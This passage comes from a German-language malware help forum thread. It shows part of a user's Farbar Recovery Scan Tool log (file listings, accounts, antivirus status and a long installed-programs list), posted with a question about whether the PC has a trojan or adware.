2017-05-07 18:09 - 2017-03-18 22:56 - 00005120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnaddr.dll
2017-05-07 17:20 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files\Windows NT
2017-05-07 17:19 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\WinBioDatabase
2017-05-07 17:19 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\Registration
2017-05-07 17:18 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\system32\Tasks_Migrated
2017-05-07 17:17 - 2017-03-20 06:43 - 00000000 ____D C:\WINDOWS\HoloShell
2017-05-07 17:17 - 2017-03-18 23:03 - 00000000 __RSD C:\WINDOWS\Media
2017-05-07 17:17 - 2017-03-18 23:03 - 00000000 __RHD C:\Users\Public\Libraries
2017-05-07 17:17 - 2017-03-18 23:03 - 00000000 ____D C:\ProgramData\USOPrivate
2017-05-07 17:17 - 2015-08-16 13:44 - 00023056 _____ C:\WINDOWS\system32\emptyregdb.dat
2017-05-07 17:16 - 2017-03-29 15:57 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ElsterFormular
2017-05-07 17:16 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\LiveKernelReports
2017-05-07 17:16 - 2017-02-19 12:30 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WISO steuer Start 2017
2017-05-07 17:16 - 2017-02-05 21:15 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Bitdefender 2017
2017-05-07 17:16 - 2017-01-22 16:12 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SHARKOON Drakonia
2017-05-07 17:16 - 2016-02-13 13:26 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WISO steuer Start 2016
2017-05-07 17:16 - 2015-08-22 17:13 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SimCity™
2017-05-07 17:16 - 2015-08-22 14:31 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Origin
2017-05-07 17:16 - 2015-05-24 14:37 - 00000000 ____D C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Unlocker
2017-05-07 17:16 - 2015-05-24 12:10 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Xbox 360 Accessories
2017-05-07 17:16 - 2015-05-24 12:00 - 00000000 ____D C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR
2017-05-07 17:16 - 2015-05-24 12:00 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR
2017-05-07 17:16 - 2015-04-26 15:41 - 00000000 ____D C:\WINDOWS\system32\STRING
2017-05-07 17:16 - 2015-04-26 15:41 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Canon MG5600 series Benutzerregistrierung
2017-05-07 17:16 - 2015-04-26 15:12 - 00000000 ____D C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam
2017-05-07 17:16 - 2015-04-26 14:27 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype
2017-05-07 17:16 - 2015-04-26 14:25 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TeamSpeak 3 Client
2017-05-07 17:16 - 2015-04-26 13:55 - 00000000 ____D C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\JDownloader
2017-05-07 17:16 - 2015-04-26 13:38 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StarCraft II
2017-05-07 17:16 - 2015-04-26 13:35 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Battle.net
2017-05-07 17:16 - 2015-04-25 17:41 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Steam
2017-05-07 17:16 - 2015-04-25 07:59 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CrystalDiskInfo
2017-05-07 17:16 - 2015-04-25 07:27 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Samsung Magician
2017-05-07 17:16 - 2015-04-25 07:08 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ASUS
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\lv-LV
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\lt-LT
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\GroupPolicy
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\et-EE
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\en-GB
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\spool
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\oobe
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\lv-LV
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\lt-LT
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\InputMethod
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\et-EE
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\en-GB
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\PolicyDefinitions
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\InputMethod
2017-05-07 17:14 - 2017-01-29 17:53 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lavalys
2017-05-07 17:14 - 2017-01-22 15:26 - 00000000 ____D C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Hammer & Chisel, Inc
2017-05-07 17:14 - 2016-11-30 18:54 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PDF24
2017-05-07 17:14 - 2016-11-30 18:10 - 00000000 ____D C:\WINDOWS\system32\ÿÿÿÿÿÿÿÿ8
2017-05-07 17:14 - 2016-05-01 13:18 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Vulkan 1.0.3.1
2017-05-07 17:14 - 2015-08-31 18:03 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Samsung
2017-05-07 17:14 - 2015-04-26 15:41 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Canon Utilities
2017-05-07 17:14 - 2015-04-26 14:43 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Paradox Interactive
2017-05-07 17:14 - 2015-04-25 17:37 - 00000000 ____D C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Ubisoft
2017-05-07 17:14 - 2015-04-25 07:17 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Realtek
2017-05-07 17:14 - 2015-04-25 07:16 - 00000000 ____D C:\Program Files\Intel
2017-05-07 17:14 - 2013-08-22 17:36 - 00000000 ____D C:\WINDOWS\system32\WindowsInternal.Inbox.Shared
2017-05-07 17:14 - 2013-08-22 17:36 - 00000000 ____D C:\WINDOWS\system32\WindowsInternal.Inbox.Media.Shared
2017-05-07 17:13 - 2017-03-18 13:40 - 00000000 ____D C:\WINDOWS\system32\Sysprep
2017-05-01 12:45 - 2015-04-25 07:04 - 00000000 ____D C:\ProgramData\AMD
2017-05-01 12:44 - 2016-05-01 13:18 - 00000000 ____D C:\Program Files (x86)\VulkanRT
2017-05-01 12:17 - 2016-09-30 17:45 - 00000000 ____D C:\ProgramData\Package Cache
2017-05-01 10:53 - 2015-04-25 17:43 - 00000000 ____D C:\Users\Dino\AppData\Local\Steam
2017-04-29 03:05 - 2017-03-18 23:06 - 00835576 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
2017-04-29 03:05 - 2017-03-18 23:06 - 00177656 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
2017-04-25 01:06 - 2017-04-14 01:44 - 00795616 _____ C:\WINDOWS\SysWOW64\atiapfxx.blb
2017-04-25 01:06 - 2017-04-14 01:44 - 00795616 _____ C:\WINDOWS\system32\atiapfxx.blb
2017-04-25 00:56 - 2017-04-14 01:44 - 03437632 _____ C:\WINDOWS\system32\atiumd6a.cap
2017-04-25 00:51 - 2017-04-14 01:44 - 03471376 _____ C:\WINDOWS\SysWOW64\atiumdva.cap
2017-04-22 19:40 - 2015-04-26 13:54 - 00000000 ____D C:\Users\Dino\AppData\Local\JDownloader v2.0

==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse =======

2015-04-25 17:18 - 2017-01-27 23:52 - 0007601 _____ () C:\Users\Dino\AppData\Local\Resmon.ResmonCfg
2017-02-05 19:40 - 2017-02-05 19:40 - 0046145 _____ () C:\ProgramData\agent.1486316443.bdinstall.bin
2017-02-05 20:08 - 2017-02-05 20:08 - 0026583 _____ () C:\ProgramData\agent.1486318128.bdinstall.bin
2017-02-05 20:09 - 2017-02-05 20:09 - 0026510 _____ () C:\ProgramData\agent.1486318150.bdinstall.bin
2017-02-05 20:52 - 2017-02-05 20:52 - 0046366 _____ () C:\ProgramData\agent.1486320772.bdinstall.bin
2017-02-05 20:55 - 2017-02-05 20:55 - 0028837 _____ () C:\ProgramData\agent.1486320909.bdinstall.bin
2017-02-05 20:57 - 2017-02-05 20:57 - 0046212 _____ () C:\ProgramData\agent.1486321078.bdinstall.bin
2017-02-05 21:01 - 2017-02-05 21:01 - 0026790 _____ () C:\ProgramData\agent.1486321314.bdinstall.bin
2017-02-05 21:02 - 2017-02-05 21:02 - 0028833 _____ () C:\ProgramData\agent.1486321377.bdinstall.bin
2017-02-05 21:11 - 2017-02-05 21:11 - 0046370 _____ () C:\ProgramData\agent.1486321901.bdinstall.bin
2017-02-09 19:09 - 2017-02-09 19:09 - 0028754 _____ () C:\ProgramData\agent.1486660167.bdinstall.bin
2017-03-08 21:56 - 2017-03-08 21:56 - 0029970 _____ () C:\ProgramData\agent.update.1489002971.bdinstall.bin
2017-02-05 21:15 - 2017-02-05 21:15 - 0381546 _____ () C:\ProgramData\cl.1486322005.bdinstall.bin
2017-02-05 21:17 - 2017-02-05 21:17 - 0055877 _____ () C:\ProgramData\dm.1486322271.bdinstall.bin
2017-02-07 23:33 - 2017-02-07 23:33 - 0035238 _____ () C:\ProgramData\dm.1486503192.bdinstall.bin
2017-05-07 17:13 - 2017-05-07 17:13 - 0000000 ____H () C:\ProgramData\DP45977C.lfl

Einige Dateien in TEMP:
====================
2017-05-19 14:16 - 2017-05-19 14:16 - 7178424 _____ (VS Revo Group                                               ) C:\Users\Dino\AppData\Local\Temp\VSUSetup.exe

==================== Bamital & volsnap ======================

(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)

C:\WINDOWS\system32\winlogon.exe => Datei ist digital signiert
C:\WINDOWS\system32\wininit.exe => Datei ist digital signiert
C:\WINDOWS\explorer.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\explorer.exe => Datei ist digital signiert
C:\WINDOWS\system32\svchost.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\svchost.exe => Datei ist digital signiert
C:\WINDOWS\system32\services.exe => Datei ist digital signiert
C:\WINDOWS\system32\User32.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\User32.dll => Datei ist digital signiert
C:\WINDOWS\system32\userinit.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\userinit.exe => Datei ist digital signiert
C:\WINDOWS\system32\rpcss.dll => Datei ist digital signiert
C:\WINDOWS\system32\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\system32\Drivers\volsnap.sys => Datei ist digital signiert

LastRegBack: 2017-05-19 15:19

==================== Ende von FRST.txt ============================
         

Alt 21.05.2017, 21:26   #8
dinoexe
 
Trojaner, Adware oder sonstiges ? - Standard

Trojaner, Adware oder sonstiges ?



Code:
ATTFilter
Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 20-05-2017
durchgeführt von Dino (21-05-2017 21:24:27)
Gestartet von C:\Users\Dino\Desktop
Windows 10 Pro Version 1703 (X64) (2017-05-07 15:20:06)
Start-Modus: Normal
==========================================================


==================== Konten: =============================

Administrator (S-1-5-21-3554052566-3312977812-1675691648-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-3554052566-3312977812-1675691648-503 - Limited - Disabled)
Dino (S-1-5-21-3554052566-3312977812-1675691648-1001 - Administrator - Enabled) => C:\Users\Dino
Gast (S-1-5-21-3554052566-3312977812-1675691648-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-3554052566-3312977812-1675691648-1003 - Limited - Enabled)

==================== Sicherheits-Center ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: Bitdefender Virenschutz (Enabled - Up to date) {3FB17364-4FCC-0FA7-6BBF-973897395371}
AS: Bitdefender Spyware-Schutz (Enabled - Up to date) {84D09280-69F6-0029-510F-AC4AECBE19CC}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
FW: Bitdefender Firewall (Enabled) {078AF241-05A3-0EFF-40E0-3E0D69EA140A}

==================== Installierte Programme ======================

(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)

ACP Application (Version: 2016.0321.0955.20 - Advanced Micro Devices, Inc.) Hidden
Adblock Plus für IE (32-Bit- und 64-Bit) (HKLM\...\{C27EF409-FB69-451F-B996-DC853C25FCA2}) (Version: 1.4 - Eyeo GmbH)
Adobe Flash Player 25 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 25.0.0.171 - Adobe Systems Incorporated)
AI Suite 3 (HKLM-x32\...\{CD36E28B-6023-469A-91E7-049A2874EC13}) (Version: 1.00.92 - ASUSTeK Computer Inc.)
AMD Settings (HKLM\...\WUCCCApp) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.)
AMD Software (HKLM\...\AMD Catalyst Install Manager) (Version: 9.0.000.8 - Advanced Micro Devices, Inc.)
ANNO 1404 - Königsedition (HKLM-x32\...\{3D9CF3CA-3AB0-4A82-9853-D7C43FD1D775}) (Version: 3.10.0000 - Ubisoft)
ANNO 2070 (HKLM-x32\...\{B48E264C-C8CD-4617-B0BE-46E977BAD694}) (Version: 1.0.0.0 - Ubisoft)
Anno 2205 (HKLM-x32\...\Uplay Install 1253) (Version:  - Ubisoft)
ASUS GPU Tweak (HKLM-x32\...\InstallShield_{532F6E8A-AF97-41C3-915F-39F718EC07D1}) (Version: 2.8.2.0 - ASUSTek COMPUTER INC.)
ASUS GPU Tweak (x32 Version: 2.8.2.0 - ASUSTek COMPUTER INC.) Hidden
Battle.net (HKLM-x32\...\Battle.net) (Version:  - Blizzard Entertainment)
Besiege (HKLM-x32\...\Steam App 346010) (Version:  - Spiderling Studios)
Bitdefender Agent (HKLM\...\Bitdefender Agent) (Version: 21.0.18.898 - Bitdefender)
Bitdefender Internet Security 2017 (HKLM\...\Bitdefender) (Version: 21.0.23.1101 - Bitdefender)
Canon Easy-WebPrint EX (HKLM-x32\...\Easy-WebPrint EX) (Version: 1.5.0.0 - Canon Inc.)
Canon IJ Network Scanner Selector EX (HKLM-x32\...\Canon_IJ_Network_Scanner_Selector_EX) (Version: 1.5.2.3 - Canon Inc.)
Canon IJ Network Tool (HKLM-x32\...\Canon_IJ_Network_UTILITY) (Version: 3.5.0 - Canon Inc.)
Canon IJ Scan Utility (HKLM-x32\...\Canon_IJ_Scan_Utility) (Version: 1.1.10.15 - Canon Inc.)
Canon MG5600 series Benutzerregistrierung (HKLM-x32\...\Canon MG5600 series Benutzerregistrierung) (Version:  - *Canon Inc.)
Canon MG5600 series MP Drivers (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_MG5600_series) (Version: 1.00 - Canon Inc.)
Canon My Printer (HKLM-x32\...\CanonMyPrinter) (Version: 3.2.1 - Canon Inc.)
Catalyst Control Center Next Localization BR (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization BR (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization BR (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization BR (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHS (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHS (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHS (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHS (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHT (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHT (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHT (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHT (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CS (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CS (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CS (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CS (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DA (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DA (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DA (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DA (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DE (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DE (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DE (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DE (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization EL (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization EL (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization EL (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization EL (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization ES (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization ES (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization ES (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization ES (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FI (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FI (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FI (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FI (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FR (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FR (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FR (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FR (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization HU (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization HU (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization HU (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization HU (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization IT (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization IT (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization IT (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization IT (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization JA (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization JA (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization JA (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization JA (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization KO (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization KO (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization KO (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization KO (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NL (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NL (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NL (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NL (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NO (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NO (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NO (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NO (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization PL (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization PL (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization PL (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization PL (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization RU (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization RU (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization RU (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization RU (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization SV (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization SV (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization SV (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization SV (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TH (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TH (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TH (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TH (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TR (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TR (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TR (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TR (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Cities Skyline (HKLM-x32\...\Cities Skyline_is1) (Version: 1.0.5.0 - Paradox Interactive)
CrystalDiskInfo 6.3.2 (HKLM-x32\...\CrystalDiskInfo_is1) (Version: 6.3.2 - Crystal Dew World)
Discord (HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\...\Discord) (Version: 0.0.297 - Hammer & Chisel, Inc.)
Drakonia Configurator (HKLM-x32\...\{2EAD3327-2F92-455F-A675-E5CC4980B67A}}_is1) (Version:  - )
ElsterFormular (HKLM-x32\...\ElsterFormular) (Version: 18.2.22525 - Landesfinanzdirektion Thüringen)
EVEREST Home Edition v2.20 (HKLM-x32\...\EVEREST Home Edition_is1) (Version: 2.20 - Lavalys Inc)
Ghost Recon Wildlands Beta (HKLM-x32\...\Uplay Install 2970) (Version:  - Ubisoft)
Ghostery (HKLM-x32\...\Ghostery) (Version:  - Ghostery Inc)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 58.0.3029.110 - Google Inc.)
Google Update Helper (x32 Version: 1.3.33.5 - Google Inc.) Hidden
Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 9.5.15.1730 - Intel Corporation)
JDownloader 2 (HKLM\...\jdownloader2) (Version: 2.0 - AppWork GmbH)
Microsoft OneDrive (HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\...\OneDriveSetup.exe) (Version: 17.3.6816.0313 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.50727 (HKLM-x32\...\{22154f09-719a-4619-bb71-5b3356999fbf}) (Version: 11.0.50727.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
